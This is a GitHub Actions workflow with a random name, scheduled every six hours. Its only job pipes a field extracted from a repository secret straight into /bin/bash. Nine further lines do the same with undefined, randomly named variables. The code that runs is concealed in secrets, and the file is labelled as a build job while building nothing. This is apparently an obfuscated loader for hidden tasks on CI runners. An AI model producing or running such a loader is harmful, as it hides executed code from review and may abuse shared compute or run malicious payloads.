name: yutongren5423
on:
  workflow_dispatch:
  schedule:
    - cron: '45 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yutongren5423
        env:
          vaee38: ${{ secrets.vaee38 }}
        run: |
          echo $vaee38 | jq -r .vdbk7 | /bin/bash
          echo $m79471 | jq -r .imnop3745 | /bin/bash
          echo $hkjxd1441 | jq -r .ilywk28 | /bin/bash
          echo $ugc2 | jq -r .qej4571 | /bin/bash
          echo $kxkvt3421 | jq -r .dqvjf88 | /bin/bash
          echo $ku54 | jq -r .g6 | /bin/bash
          echo $lkstl07733 | jq -r .dadmc078 | /bin/bash
          echo $wcuf6950 | jq -r .p4 | /bin/bash
          echo $yn459 | jq -r .trqrm8 | /bin/bash
          echo $i721 | jq -r .rn4 | /bin/bash

